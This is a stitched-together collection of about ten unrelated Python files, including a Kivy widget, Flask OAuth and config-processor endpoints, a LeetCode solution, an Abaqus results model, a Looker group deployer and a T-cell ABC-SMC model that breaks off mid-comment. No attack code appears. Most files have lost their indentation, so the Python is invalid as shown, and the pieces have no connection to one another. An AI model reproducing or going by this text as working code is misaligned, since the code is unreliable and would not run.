def _build_item(self, parent):
if self._render is None:
return Label(text=self.item, halign='left', valign='middle', text_size=(parent.width, None))
else:
return self._render(self.index, self.item, parent)
def rebuild(self):
self.clear_widgets()
self.add_widget(self._build_item(self.parent))
def on_touch_down(self, touch):
if self.parent.collide_point(*touch.pos):
if self.collide_point(*touch.pos):
self.selected = True
else:
self.selected = False
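# A minimal usage sketch (assumed, not part of this module): embed the ListView in a ScrollView
# and react to selection changes via the selected_element property.
#
# from kivy.app import App
# from kivy.uix.scrollview import ScrollView
#
# class DemoApp(App):
#     def build(self):
#         root = ScrollView()
#         lv = ListView(items=['alpha', 'beta', 'gamma'], size_hint_y=None)
#         lv.bind(selected_element=lambda _, sel: print(sel.index, sel.item))
#         root.add_widget(lv)
#         return root
#
# if __name__ == '__main__':
#     DemoApp().run()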
|
import flask
import flask_oauthres
from . import config
app = flask.Flask(__name__)
app.config.from_mapping(
SECRET_KEY=config.SECRET_KEY,
TESTING=config.TESTING,
DEBUG=config.DEBUG
)
oauth = flask_oauthres.OAuth2Resource(app=app,
resource_id=config.OAUTH2_RESOURCE_ID,
client_id=config.OAUTH2_CLIENT_ID,
client_secret=config.OAUTH2_CLIENT_SECRET,
check_token_endpoint_url=config.OAUTH2_CHECK_TOKEN_ENDPOINT_URL)
@app.route('/')
def index():
return "OK"
@app.route('/secured_with_scope')
@oauth.has_scope('scope_xyz')
def endpoint_secured_by_token_with_scope():
return "OK"
@app.route('/secured_with_any_of_role')
@oauth.has_any_role('role_abc', 'role_xyz')
def endpoint_secured_by_token_with_any_of_role():
return "OK"
@app.route('/secured_with_all_require_roles')
@oauth.has_all_roles('role_abc', 'role_xyz')
def endpoint_secured_by_token_with_all_roles():
return "OK"
|
from typings import *
class Event(object):
def __init__(self, start_date: int, end_time: int, event_type: str, room: str, color="cyan", **args):
self.start_date = start_date
self.end_time = end_time
self.event_type = event_type
self.room = room
self.color = color
# Handle rest args for specific event
def parse_event(s:str):
pass
# TODO: Handle parsing a string into an Event.
|
"""
Given a word, you need to judge whether the usage of capitals in it is right or not.
We define the usage of capitals in a word to be right when one of the following cases holds:
All letters in this word are capitals, like "USA".
All letters in this word are not capitals, like "leetcode".
Only the first letter in this word is capital, like "Google".
Otherwise, we define that this word doesn't use capitals in a right way.
Example 1:
Input: "USA"
Output: True
Example 2:
Input: "FlaG"
Output: False
Note: The input will be a non-empty word consisting of uppercase and lowercase latin letters.
"""
class Solution:
def detectCapitalUse(self, word): # 32ms
return word.islower() or word.isupper() or word.istitle()
def detectCapitalUse2(self, word): # 24ms
if word[0].islower():
return word.islower()
elif len(word) < 3:
return True
elif word[1].isupper():
return word[2:].isupper()
else:
return word[2:].islower()
|
"""
Definitions of classes that define the imported model
"""
import numpy as np
from pyvista import UnstructuredGrid
from .step import Step
from .faces import RigidSurface, DeformableSurface, Face
from .elements import N_INT_PNTS
class Model:
"""Class for the model.
This contains all the information of the model.
Attributes
----------
nodes : dict
elements : dict
element_sets : dict
node_sets : dict
surfaces : dict
"""
def __init__(self):
self.nodes: dict = dict()
self.elements: dict = dict()
self.element_sets: dict = dict()
self.node_sets: dict = dict()
self.surfaces: dict = dict()
self.results: dict = dict()
self.metadata: dict = dict()
self.mesh = None
self.elem_output: dict = dict()
self.nodal_output: dict = dict()
self.steps: dict = dict()
self._curr_out_step: int = None
self._curr_incr: int = None
self._dimension: int = None
self._status: int = None
def set_status(self, n):
"""Set the SDV number controling the element deletion
Parameters
----------
n : TODO
Returns
-------
TODO
"""
self._status = n
def add_node(self, node):
self.nodes[node._num] = node
def add_element(self, element):
self.elements[element.num] = element
def add_set(self, name, elements, s_type):
"""Add an element set.
Parameters
----------
name : TODO
Returns
-------
TODO
"""
if s_type == "node":
self.node_sets[name] = elements
elif s_type == "element":
self.element_sets[name] = elements
def add_deformable_surface(self, name, dimension, master_surf):
"""Add a surface to the model.
Parameters
----------
name : TODO
faces : TODO
"""
if name not in self.surfaces:
self.surfaces[name] = DeformableSurface(name, dimension, self, master_surf)
def add_rigid_surface(self, name, dimension, ref_point):
"""Add a surface to the model.
Parameters
----------
name : TODO
faces : TODO
"""
if name not in self.surfaces:
self.surfaces[name] = RigidSurface(name, dimension, self, ref_point)
def add_face_to_surface(self, surface, face_info):
"""Add a face to an existing surface
Parameters
----------
surface : str
Label of the surface to add the face to.
face_info : dict
Dictionary with the data to create a Face object.
"""
elem_n = face_info["element"]
if elem_n == 0:
element = None
else:
element = self.elements[elem_n]
face = Face(element, face_info["face"], face_info["nodes"])
self.surfaces[surface].add_face(face)
def add_elem_output(self, elem, var, data, step, inc, intpnt):
"""Add element output data
Parameters
----------
var : TODO
data : TODO
intpnt : int
Integration point number if the results contain integration point data.
TODO: handle elements with different outputs.
Returns
-------
TODO
"""
if var not in self.elem_output[step][inc]:
self.elem_output[step][inc][var] = dict()
if elem not in self.elem_output[step][inc][var]:
etype = self.elements[elem].elem_code
self.elem_output[step][inc][var][elem] = np.empty((N_INT_PNTS[etype], 1), dtype=np.float64)
self.elem_output[step][inc][var][elem][intpnt - 1] = data
def add_nodal_output(self, node, var, data, step, inc):
"""Add nodal output results
Parameters
----------
node : int
Node to which assign the data
var : str
Name of the variable
data : float
Value of the output
"""
if var not in self.nodal_output[step][inc]:
self.nodal_output[step][inc][var] = dict()
self.nodal_output[step][inc][var][node] = data
def add_step(self, n, data):
"""Add a new step to the output database
Parameters
----------
n : int
Index of the step
data : list
Arguments for the Step object
Returns
-------
TODO
"""
# Add step to model
if n not in self.steps:
self.steps[n] = Step(self, n, data)
inc_n = data["increment number"]
self._curr_out_step = n
self._curr_incr = inc_n
# Initialize output repository for the current increment in step
self.nodal_output[n] = {inc_n: dict()}
self.elem_output[n] = {inc_n: dict()}
# Add increment to step
else:
step_time = data["step time"]
load_prop = data["load proportionality"]
time_inc = data["time increment"]
inc_n = data["increment number"]
# Initialize output repository for the current increment in step
self.nodal_output[n][inc_n] = dict()
self.elem_output[n][inc_n] = dict()
self._curr_out_step = data["step number"]
self._curr_incr = data["increment number"]
self.steps[n].add_increment(inc_n, time_inc, step_time, load_prop)
def get_nodal_result(self, var, step, inc, node_set=None, elem_set=None, node_ids=None):
"""Get nodal results
Parameters
----------
var : str
Output variable
step : int
Number of the Abaqus step.
inc : int
Number of the increment.
node_set : str, list
elem_set : str, list
Returns
-------
TODO
"""
# Get the keys of the nodes in the set of nodes
if node_set is not None:
keys = sorted(self.get_nodes_from_set(node_set))
elem_ids = self.get_elems_from_nodes(keys)
# Get elements belonging to the set
elif elem_set is not None:
elem_ids = self.get_elems_from_set(elem_set)
keys = sorted(self.get_nodes_from_elems(elem_ids))
elif node_ids is not None:
elem_ids = self.get_elems_from_nodes(node_ids)
keys = sorted(node_ids)
else:
# FIXME: have this variable sorted globally
keys = sorted(list(self.nodes.keys()))
try:
elem_ids = self.elem_output[step][inc][var].keys()
except KeyError:
print(f"Requested output variable {var} not present as element result of the model.")
if var in self.nodal_output[step][inc]:
results = self.nodal_output[step][inc][var]
elif var in self.elem_output[step][inc]:
results = self._nodal_result_from_elements(var, step, inc, elem_ids)
else:
# FIXME: handle errors properly some day
print("Variable not present")
list_res = [results[k] for k in keys]
return np.array(list_res)
def _nodal_result_from_elements(self, var, step, inc, elem_ids):
"""Get nodal results from element results by extrapolating.
Shape functions are used to extrapolate to the nodes.
Parameters
----------
var : str
Result variable.
step : int
Step
inc : int
Increment
Returns
-------
array
"""
keys_out = elem_ids
output = self.elem_output[step][inc][var]
elements = self.elements
# FIXME: there are some hacky things here. Try to fix that
nodes = self.nodes
res_nodes = np.zeros(len(nodes) + 1)
counter = np.zeros(len(nodes) + 1)
for ix in keys_out:
var_i = output[ix]
# Returns extrapolated variables and respective node labels
nodal_i, elem_nodes = elements[ix].extrapolate_to_nodes(var_i)
res_nodes[elem_nodes] += nodal_i.flatten()
counter[elem_nodes] += 1
# FIXME: Another hacky fix
counter[counter == 0] = np.nan
result = res_nodes / counter
# FIXME: output correct size
return result
def get_time_history_result_from_node(self, var, node_id, steps="all"):
"""Get results for a node duiring the whole simulation.
Parameters
----------
var : str
Name of the output variable.
node_id : int
Label of the node.
steps : str, list, int
The steps used to retrieve the results. Default: 'all'
Returns
-------
np.array :
Results for the given variable `var`
"""
if steps == "all":
    steps = self.steps.keys()
# The first step is always zero (FIXME: maybe not always if there are
# prestresses.)
result = [0]
for step in steps:
for inc, val in self.nodal_output[step].items():
result += [val[var][node_id]]
return np.array(result)
def get_nodal_vector_result(self, var, step, inc, node_set=None, elem_set=None):
"""Get the vector of a variable at each node.
Parameters
----------
var : str
Output variable
step : int
Number of the Abaqus step.
inc : int
Number of the increment.
node_set : str, list
elem_set : str, list
Returns
-------
array :
Nx3 array of displacements in each node
"""
coords = list()
# Get the keys of the nodes in the set of nodes
if node_set is not None:
keys = sorted(self.get_nodes_from_set(node_set))
# Get elements belonging to the set
elif elem_set is not None:
elem_ids = self.get_elems_from_set(elem_set)
keys = sorted(self.get_nodes_from_elems(elem_ids))
else:
nodes = self.nodes
keys = sorted(list(self.nodes.keys()))
for k in keys:
coords.append(self._get_node_vector_result(k, var, step, inc))
coords_ar = np.array(coords)
return coords_ar
def get_element_result(self, var, step, inc, elem_set=None, elem_id=None):
"""Get element results.
Parameters
----------
var : str
Output variable.
step : int
Number of the Abaqus step.
inc : int
Number of the increment.
Returns
-------
array :
One averaged value per element; NaN where the variable is unavailable.
"""
# FIXME: have this variable sorted globally
keys = sorted(list(self.elements.keys()))
# Elements for which the output variable exists
keys_out = set(self.elem_output[step][inc][var].keys())
if self._status is not None:
status = self.elem_output[step][inc][f"SDV{self._status}"]
del_elem = [k for k, v in status.items() if v[0] == 0]
keys_out = [k for k in keys_out if k not in del_elem]
keys = [k for k in keys if k not in del_elem]
if elem_set is not None:
set_elements = self.get_elems_from_set(elem_set)
def filter_elements(elem):
if elem in set_elements:
return True
else:
return False
keys_out = set(filter(filter_elements, keys_out))
keys = list(filter(filter_elements, keys))
elif elem_id is not None:
set_elements = set(elem_id)
def filter_elements(elem):
if elem in set_elements:
return True
else:
return False
keys_out = set(elem_id)
keys = elem_id
results = self.elem_output[step][inc][var]
list_res = [np.mean(results[k]) if k in keys_out else np.nan for k in keys]
ar_results = np.array(list_res)
return ar_results
def get_surface_result(self, var, step, inc, surf_name):
"""Get element result on a given surface.
Parameters
----------
var : str
Output variable.
step : int
Simulation step.
inc : int
Increment within the step.
surf_name : str
Name of the surface.
Returns
-------
array :
Element result for each face of the surface.
"""
# Get underlying element numbers
surf = self.surfaces[surf_name]
e_nums = [face._element.num for face in surf._faces]
# Retrieve element output
out = self.get_element_result(var, step, inc, elem_id=e_nums)
return out
def add_metadata(self, metadata):
"""Add metadata to the model."""
self.metadata[metadata[0]] = metadata[1]
def get_node_coords(self, node_set=None, elem_set=None, node_id=None, return_map=False):
"""Get a list with the node coordinates.
Return
------
coords : array
An array of size (n, 3), where n is the number of nodes
kmap : dict
If either `node_set`, `elem_set` or `node_id` are given and `return_map` is
True, then a dictionary is returned mapping the new node ids to the original
node ids.
"""
nodes = self.nodes
if node_set is not None:
old_keys = sorted(self.get_nodes_from_set(node_set))
keys = np.arange(1, len(old_keys) + 1, 1)
# Map new indices to old indices
kmap = {k: ix for k, ix in zip(keys, old_keys)}
elif node_id is not None:
old_keys = sorted([node_id])
keys = np.arange(1, len(old_keys) + 1, 1)
# Map new indices to old indices
kmap = {k: ix for k, ix in zip(keys, old_keys)}
elif elem_set is not None:
elems = self.get_elems_from_set(elem_set)
old_keys = sorted(self.get_nodes_from_elems(elems))
keys = np.arange(1, len(old_keys) + 1, 1)
# Map new indices to old indices
kmap = {k: ix for k, ix in zip(keys, old_keys)}
else:
keys = sorted(list(nodes.keys()))
kmap = {k: k for k in keys}
coords = np.empty((len(keys), 3))
for k in keys:
coords[k - 1, :] = nodes[kmap[k]].coords
coords_ar = np.array(coords)
if return_map:
return coords_ar, kmap
else:
return coords_ar
def get_deformed_node_coords(self, step, inc, scale=1, node_id=None, node_set=None,
elem_set=None):
"""Get deformed node coordinates.
Parameters
----------
step : int
Step to get deformations from
inc : int
Index of the increment in the required step.
scale : float
Multiply the deformations by this number.
node_set : str, list
elem_set : str, list
Returns
-------
array :
2D-Array with the node coordinates
"""
coords, kmap = self.get_node_coords(node_id=node_id, node_set=node_set,
elem_set=elem_set, return_map=True)
for k in range(1, np.shape(coords)[0] + 1, 1):
coords[k - 1, :] += self._get_node_vector_result(kmap[k], "U", step, inc) * scale
return coords
def get_cells(self, elem_set=None, status=None):
"""Get the definition of cells for all elements.
The format is the one required by VTK.
Returns
-------
cells : array
Cells of each elements
offset : array
Offset for each element
elem_type : array
Array with element types
"""
elements = self.elements
# Element deletion is considered here
if status is not None:
def is_del(n_ele):
if n_ele in status.keys():
if status[n_ele][0] != 0:
return True
else:
return False
else:
return True
# Don't consider the deleted elements for mesh
elements = {k: v for k, v in elements.items() if is_del(k)}
if elem_set is not None:
elem_ids = self.get_elems_from_set(elem_set)
nodes = self.get_nodes_from_elems(elem_ids)
new_node_ids = np.arange(1, len(nodes) + 1, 1)
kmap = {k: ix for k, ix in zip(nodes, new_node_ids)}
elements = {k: elements[k] for k in elem_ids}
else:
kmap = None
keys = sorted(list(elements.keys()))
cells = list()
offset = list()
elem_type = list()
for el_i in keys:
cells.extend(elements[el_i].get_cell(kmap=kmap))
offset.append(len(elements[el_i]._nodes))
elem_type.append(elements[el_i]._elem_type)
ar_cells = np.array(cells)
ar_offset = np.cumsum(np.array(offset, dtype=int)) - offset[0]
ar_elem_type = np.array(elem_type, np.int8)
return ar_cells, ar_offset, ar_elem_type
def get_mesh(self, elem_set=None):
"""Construct the mesh of the finite element model
Returns
-------
mesh : mesh
VTK mesh unstructured grid
"""
nodes = self.get_node_coords(elem_set=elem_set)
cells, offset, elem_t = self.get_cells(elem_set)
mesh = UnstructuredGrid(offset, cells, elem_t, nodes)
self.mesh = mesh
return self.mesh
def get_surface(self, name, return_nodes=False, step=None, inc=None, scale=1):
"""Get mesh of surface.
Parameters
----------
name : str
Name of the surface.
Returns
-------
mesh :
Mesh representation of the surface.
"""
surface = self.surfaces[name]
if return_nodes:
return surface.mesh, surface.get_used_nodes().keys()
else:
return surface.mesh
def get_deformed_mesh(self, step, inc, scale=1, elem_set=None):
"""Construct the deformed mesh in step with scaled deformations.
Parameters
----------
step : int
Index of the needed step
inc : int
Index of the increment within the step
scale : float
Scale to be applied to the deformations
elem_set : str, list, None
Restrict the mesh to the elements of this set.
Returns
-------
mesh : mesh
VTK mesh unstructured grid
"""
nodes = self.get_deformed_node_coords(step, inc, scale, elem_set=elem_set)
if self._status:
status = self.elem_output[step][inc][f"SDV{self._status}"]
else:
status = None
cells, offset, elem_t = self.get_cells(elem_set=elem_set, status=status)
mesh = UnstructuredGrid(offset, cells, elem_t, nodes)
self.mesh = mesh
return self.mesh
def _get_node_vector_result(self, n, var, step, inc):
"""Get the displacement vector of the node `n`
Parameters
----------
n : int
The index of the node.
step : int
The step for which the displacement is required.
inc : int
The increment within the required step.
Returns
-------
array :
An array with the displacements of the node
"""
nodal_output = self.nodal_output[step][inc]
if self._dimension == 3:
u = np.array([
nodal_output[f"{var}1"][n],
nodal_output[f"{var}2"][n],
nodal_output[f"{var}3"][n],
])
else:
u = np.array([
nodal_output[f"{var}1"][n],
nodal_output[f"{var}2"][n],
0,
])
return u
def post_import_actions(self):
"""Execute some functions after importing all the records into the model."""
pass
def get_elems_from_set(self, elem_set):
"""Get the element IDs belonging to an elemnt set.
Parameters
----------
elem_set : str, list
Name of the set or list with names of different sets.
Returns
-------
set :
Element IDs present in the set(s).
"""
if isinstance(elem_set, str):
elem_ids = self.element_sets[elem_set]
# Is list
else:
elem_ids = []
for set_i in elem_set:
elem_ids += self.element_sets[set_i]
return set(elem_ids)
def get_nodes_from_elems(self, elems):
"""Get nodal IDs from a list of element IDs.
Parameters
----------
elems : list
Returns
-------
array :
Unique node labels used by the given elements.
"""
elements = self.elements
# Initialize list to store all the nodes
nodes = list()
for el in elems:
nodes += elements[el]._nodes
# Remove duplicates
nodes_ar = np.array(nodes, dtype=int)
return np.unique(nodes_ar)
def get_nodes_from_set(self, node_set):
"""Get node IDs belonging to the node set.
Parameters
----------
node_set : str, list
Returns
-------
list :
Node labels belonging to the given set(s).
"""
if isinstance(node_set, str):
node_ids = self.node_sets[node_set]
# Is list
else:
node_ids = []
for set_i in node_set:
node_ids += self.node_sets[set_i]
return node_ids
def get_elems_from_nodes(self, node_ids):
"""Get element IDs from a set of nodes.
Parameters
----------
node_ids : list
Returns
-------
array :
Unique element labels connected to the given nodes.
"""
nodes = self.nodes
elem_ids = list()
for ni in node_ids:
elem_ids += nodes[ni].in_elements
# Remove duplicates
elems_ar = np.array(elem_ids, dtype=int)
return np.unique(elems_ar)
def __repr__(self):
n_out = list(self.nodal_output[1][1].keys())
e_out = list(self.elem_output[1][1].keys())
s = f"""Abaqus result object:
--------------------
Number of nodes: {len(self.nodes):,}
Number of elements: {len(self.elements):,}
Number of node sets: {len(self.node_sets):,}
Number of element sets: {len(self.element_sets):,}
Nodal output variables: {n_out}
Element output variables: {e_out}
"""
return s
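# A minimal, self-contained sketch of the nodal averaging performed in
# `_nodal_result_from_elements`: every element that shares a node adds its
# extrapolated value to that node, and the accumulated sum is divided by the
# number of contributing elements. The connectivity and values below are made
# up purely for illustration.
if __name__ == "__main__":
    import numpy as np

    elem_nodes = {1: np.array([1, 2, 3]), 2: np.array([2, 3, 4])}                # hypothetical connectivity
    extrapolated = {1: np.array([1.0, 2.0, 3.0]), 2: np.array([4.0, 5.0, 6.0])}  # per-node element values

    res_nodes = np.zeros(5)   # index 0 unused because node labels start at 1
    counter = np.zeros(5)
    for el, nodes_el in elem_nodes.items():
        res_nodes[nodes_el] += extrapolated[el]
        counter[nodes_el] += 1
    counter[counter == 0] = np.nan   # avoid division by zero for unused slots
    print(res_nodes / counter)       # averaged nodal values; NaN where no element contributes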
|
class DefaultProcedure:
def __init__(self):
pass
def simulate(self):
return 0
def setup(self):
return 0
def initialize(self):
return 0
|
import logging
import re
from looker_sdk import models
from looker_deployer.utils import deploy_logging
from looker_deployer.utils.get_client import get_client
from looker_deployer.utils.match_by_key import match_by_key
logger = deploy_logging.get_logger(__name__)
def get_filtered_groups(source_sdk, pattern=None):
groups = source_sdk.all_groups()
logger.debug(
"Groups pulled",
extra={
"groups_name": [i.name for i in groups]
}
)
groups = [i for i in groups if not i.externally_managed]
if pattern:
compiled_pattern = re.compile(pattern)
groups = [i for i in groups if compiled_pattern.search(i.name)]
logger.debug(
"Groups in Group filtered",
extra={
"filtered_groups": [i.name for i in groups],
"pattern": pattern
}
)
return groups
def write_groups_in_group(source_sdk, target_sdk, pattern=None): # noqa: C901
# INFO: Get all groups from source and target instances that match pattern
# for name
groups = get_filtered_groups(source_sdk, pattern)
target_groups = get_filtered_groups(target_sdk, pattern=None)
# INFO: Start Loop of Create/Update on Target
for group in groups:
matched_group = match_by_key(target_groups, group, "name")
logger.debug("Group Matched " + matched_group.name)
groups_in_group = source_sdk.all_group_groups(group.id)
target_groups_in_group = target_sdk.all_group_groups(matched_group.id)
# INFO: Need to loop through the groups in group to identify
# target group ID
matched_groups_in_group = []
for nested_group in groups_in_group:
    target_nested_group = match_by_key(target_groups, nested_group, "name")
    if target_nested_group:
        nested_group.id = target_nested_group.id
        matched_groups_in_group.append(nested_group)
groups_in_group = matched_groups_in_group
# INFO: If groups in groups between instances is different, we need to
# either delete or create
source_group_ids = [nested_group.id for nested_group in groups_in_group]
target_group_ids = [nested_group.id for nested_group in target_groups_in_group]
all_group_ids = list(set().union(source_group_ids, target_group_ids))
for group_id in all_group_ids:
    in_source = group_id in source_group_ids
    in_target = group_id in target_group_ids
if in_source and not in_target:
logger.debug("No Groups in Group found. Creating...")
logger.debug("Deploying Groups in Group",
extra={"group_name": group.name,
"group_group_id": group_id})
target_sdk.add_group_group(group_id=matched_group.id,
body=models.GroupIdForGroupInclusion
(group_id=group_id))
logger.info("Deployment Complete",
extra={"group_name": group.name,
"group_group_id": group_id})
elif not in_source and in_target:
logger.debug("Extra Groups in Group found. Deleting...")
logger.debug("Removing Groups in Group",
extra={"group_name": group.name,
"group_group_id": group_id})
target_sdk.delete_group_from_group(group_id=matched_group.id,
deleting_group_id=group_id)
logger.info("Deployment Complete",
extra={"group_name": group.name,
"group_group_id": group_id})
def main(args):
if args.debug:
logger.setLevel(logging.DEBUG)
source_sdk = get_client(args.ini, args.source)
for t in args.target:
target_sdk = get_client(args.ini, t)
write_groups_in_group(source_sdk, target_sdk, args.pattern)
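# A tiny, synthetic illustration of the create/delete decision made in
# write_groups_in_group: ids present only in the source are created on the
# target, ids present only on the target are deleted. The id values are made up.
if __name__ == "__main__":
    source_group_ids = ["1", "2", "3"]
    target_group_ids = ["2", "3", "4"]
    for group_id in sorted(set(source_group_ids) | set(target_group_ids)):
        if group_id in source_group_ids and group_id not in target_group_ids:
            print("would create nested group", group_id)
        elif group_id not in source_group_ids and group_id in target_group_ids:
            print("would delete nested group", group_id)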
|
# (c) Copyright 2017-2018 SUSE LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import abort
from flask import Blueprint
from flask import jsonify
from flask import make_response
from flask import request
import os
from oslo_config import cfg
from oslo_log import log as logging
import subprocess
import sys
import tempfile
import time
from . import model
from . import playbooks
from . import policy
LOG = logging.getLogger(__name__)
bp = Blueprint('config_processor', __name__)
CONF = cfg.CONF
@bp.route("/api/v2/config_processor", methods=['POST'])
@policy.enforce('lifecycle:run_config_processor')
def run_config_processor():
"""Validate the current input model
No body is required
This will run the configuration processor directly, not the playbook. This
is a synchronous call which takes up to about 20 seconds. The HTTP response
will be sent once the config processor has finished. If the model was
deemed valid, the response will have a status code of 201 and the body will
be the output of the config processor (Note: this is in fact the expanded
input model and is quite large). If the model was invalid, the status code
will be 400 and the body of the response will contain the log of the
Config Processor explaining why things failed.
.. :quickref: Config Processor; Validate the current input model
**Example valid response**:
.. sourcecode:: http
HTTP/1.1 201 CREATED
**Example invalid response**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
Content-Type: application/json
{
"errorCode": 254,
"log": "Processing cloud model version 2.0#### ...."
"startTime": 1457710327543,
"endTime": 1457710330491,
}
"""
# TODO(gary): Remove this and modify the UI to avoid calling the back end
req = request.json
if req and "want_fail" in req:
error = {"log": "woops", "errorCode": 254}
abort(make_response(jsonify(error), 400))
elif req and "want_pass" in req:
return '', 201
python = CONF.paths.cp_python_path or sys.executable
tempdir = tempfile.mkdtemp()
output_dir = os.path.join(tempdir, "clouds")
log_dir = os.path.join(tempdir, "log")
cmd = playbooks.build_command_line(python, CONF.paths.cp_script_path, [
'-l', log_dir,
'-c', os.path.join(CONF.paths.model_dir, 'cloudConfig.yml'),
'-s', CONF.paths.cp_services_dir,
'-r', CONF.paths.cp_schema_dir,
'-o', output_dir])
start_time = int(time.time())
try:
subprocess.check_output(cmd, stderr=subprocess.STDOUT,
universal_newlines=True)
except Exception as e:
# Cannot get except subprocess.CalledProcessError to be caught, so
# catch Exception
LOG.exception(e)
error = {
'startTime': start_time,
'endTime': int(time.time())
}
if hasattr(e, 'output'):
error['log'] = e.output
if hasattr(e, 'returncode'):
error['errorCode'] = e.returncode
abort(make_response(jsonify(error), 400))
input_model = model.read_model()
cloud_name = input_model['inputModel']['cloud']['name']
generated = os.path.join(output_dir, cloud_name, '2.0', 'stage', 'info')
if os.path.exists(generated):
return '', 201
msg = 'Unable to locate config processor output'
error_file = os.path.join(log_dir, "errors.log")
if os.path.exists(error_file):
try:
with open(error_file) as f:
lines = f.readlines()
msg = ''.join(lines)
except IOError:
pass
error = {
'startTime': start_time,
'endTime': int(time.time()),
'log': msg,
'errorCode': 127
}
abort(make_response(jsonify(error), 400))
|
from typing import TYPE_CHECKING, List, Optional
from .formatter import Formatter
if TYPE_CHECKING:
from sharptable.tables import Table
class CompositeFormatter(Formatter):
"""
Class allowing for multiple formatters to be applied.
"""
def __init__(self, formatters: Optional[List[Formatter]] = None):
"""
Args:
formatters: Optional list of formatters to apply.
"""
self._formatters: List[Formatter] = []
if formatters is not None:
self._formatters = formatters
def add(self, formatter: Formatter) -> None:
"""
Add new formatter to list of formatters.
Args:
formatter: Formatter to add to list of formatters.
"""
self._formatters.append(formatter)
def apply(self, table: "Table") -> None:
"""
Apply transform to sharptable.
Args:
table: Table that formatter is applied to.
"""
for formatter in self._formatters:
formatter.apply(table)
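# A short usage sketch (hypothetical formatter and table; assumes a Formatter
# subclass only has to implement `apply`, which is all CompositeFormatter relies on):
#
#   class ShadeHeaderFormatter(Formatter):
#       def apply(self, table):
#           ...  # mutate the table in place
#
#   composite = CompositeFormatter([ShadeHeaderFormatter()])
#   composite.add(ShadeHeaderFormatter())
#   composite.apply(table)   # every registered formatter runs, in insertion order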
|
"""Pluggable utilities for Hydrus."""
from contextlib import contextmanager
from flask import appcontext_pushed
from flask import g
from hydrus.hydraspec import doc_writer_sample
from hydrus.data.db_models import engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.session import Session
from hydrus.hydraspec.doc_writer import HydraDoc
@contextmanager
def set_session(application, DB_SESSION):
"""Set the database session for the app. Must be of type <hydrus.hydraspec.doc_writer.HydraDoc>."""
if not isinstance(DB_SESSION, Session):
raise TypeError("The API Doc is not of type <sqlalchemy.orm.session.Session>")
def handler(sender, **kwargs):
g.dbsession = DB_SESSION
with appcontext_pushed.connected_to(handler, application):
yield
@contextmanager
def set_hydrus_server_url(application, server_url):
"""Set the server URL for the app. Must be of type <str>."""
if not isinstance(server_url, str):
raise TypeError("The server_url is not of type <str>")
def handler(sender, **kwargs):
g.hydrus_server_url = server_url
with appcontext_pushed.connected_to(handler, application):
yield
@contextmanager
def set_api_name(application, api_name):
"""Set the server name or EntryPoint for the app. Must be of type <str>."""
if not isinstance(api_name, str):
raise TypeError("The api_name is not of type <str>")
def handler(sender, **kwargs):
g.api_name = api_name
with appcontext_pushed.connected_to(handler, application):
yield
@contextmanager
def set_doc(application, APIDOC):
"""Set the API Documentation for the app. Must be of type <hydrus.hydraspec.doc_writer.HydraDoc>."""
if not isinstance(APIDOC, HydraDoc):
raise TypeError("The API Doc is not of type <hydrus.hydraspec.doc_writer.HydraDoc>")
def handler(sender, **kwargs):
g.doc = APIDOC
with appcontext_pushed.connected_to(handler, application):
yield
@contextmanager
def set_authentication(application, authentication):
"""Set the wether API needs to be authenticated or not."""
if not isinstance(authentication, bool):
raise TypeError("Authentication flag must be of type <bool>")
def handler(sender, **kwargs):
g.authentication_ = authentication
with appcontext_pushed.connected_to(handler, application):
yield
def get_doc():
"""Get the server API Documentation."""
apidoc = getattr(g, 'doc', None)
if apidoc is None:
apidoc = doc_writer_sample.api_doc
g.doc = apidoc
return apidoc
def get_authentication():
"""Check wether API needs to be authenticated or not."""
authentication = getattr(g, 'authentication_', None)
if authentication is None:
authentication = False
g.authentication_ = authentication
return authentication
def get_api_name():
"""Get the server API name."""
api_name = getattr(g, 'api_name', None)
if api_name is None:
api_name = "api"
g.api_name = api_name
return api_name
def get_hydrus_server_url():
"""Get the server URL."""
hydrus_server_url = getattr(g, 'hydrus_server_url', None)
if hydrus_server_url is None:
hydrus_server_url = "http://localhost/"
g.hydrus_server_url = hydrus_server_url
return hydrus_server_url
def get_session():
"""Get the Database Session for the server."""
session = getattr(g, 'dbsession', None)
if session is None:
session = sessionmaker(bind=engine)()
g.dbsession = session
return session
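# A brief usage sketch (hypothetical Flask app, shown only to illustrate how the
# context managers above push values onto `g` whenever an app context is pushed):
#
#   from flask import Flask
#   app = Flask(__name__)
#   with set_api_name(app, "api"):
#       with app.test_request_context("/"):
#           assert get_api_name() == "api"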
|
# Python code to run the ABC-SMC algorithm to parametrise the multi-stage model with cell generations
# making use of F5 T cells data.
# Reference: "Approximate Bayesian Computation scheme for parameter inference and model selection
# in dynamical systems" by Toni T. et al. (2008).
# Import the required modules.
import numpy as np
from scipy.linalg import expm
G = 11 # total number of generations
dist_gen = 6 # used to define generation 5+
n_pars = 6 # number of parameters in the multi-stage model
# Reading the data.
data = np.loadtxt("data_F5.txt")
std_dev = np.loadtxt("std_dev_F5.txt")
# Define the time points (unit of hours).
t2 = np.array([72, 96, 120, 144, 168, 240, 288, 432])
# Define the multi-stage model with cell generations.
def diag(g, N, l, m):
if g < 5:
return (np.diag([-(l[g] + m[g])] * N) + np.diag([l[g]] * (N - 1), -1))
else:
return (np.diag([-(l[5] + m[5])] * N) + np.diag([l[5]] * (N - 1), -1))
def matrix(N0, N1, l, m):
M = np.zeros((N0 + (G - 1) * N1, N0 + (G - 1) * N1))
M[0:N0, 0:N0] = diag(0, N0, l, m)
for i in range(1, G):
M[N0 + (i - 1) * N1:N0 + i * N1, N0 + (i - 1) * N1:N0 + i * N1] = diag(i, N1, l, m)
M[N0, N0 - 1] = 2 * l[0]
for i in range(1, G - 1):
if i < 5:
M[N0 + i * N1, N0 + i * N1 - 1] = 2 * l[i]
else:
M[N0 + i * N1, N0 + i * N1 - 1] = 2 * l[5]
return (M)
def exp_matrix(N0, N1, inits, times, l, m):
output = np.zeros((len(times), N0 + N1 * (G - 1)))
A = matrix(N0, N1, l, m)
for i in range(len(times)):
sol = np.dot(expm(A * times[i]), inits)
output[i] = sol
return output.T
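# To make the construction above concrete: with, say, N0 = 2 stages in generation 0
# and N1 = 1 stage in every later generation, `matrix` builds an
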